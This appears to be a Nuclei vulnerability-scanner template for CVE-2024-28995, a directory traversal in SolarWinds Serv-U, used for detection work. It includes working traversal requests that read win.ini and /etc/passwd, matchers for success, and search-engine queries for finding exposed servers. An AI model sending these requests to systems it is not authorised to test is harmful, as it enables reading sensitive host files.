id: CVE-2024-28995 info: name: SolarWinds Serv-U - Directory Traversal author: DhiyaneshDK severity: high description: | SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. reference: - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2024-28995 - https://x.com/stephenfewer/status/1801191416741130575 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-28995 cwe-id: CWE-22 cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: solarwinds product: serv-u shodan-query: html:"Serv-U" fofa-query: server="Serv-U" tags: cve,cve2024,lfi,solarwinds,serv-u http: - raw: - | GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 Host: {{Hostname}} - | GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: dsl dsl: - 'contains(header, "Serv-U")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950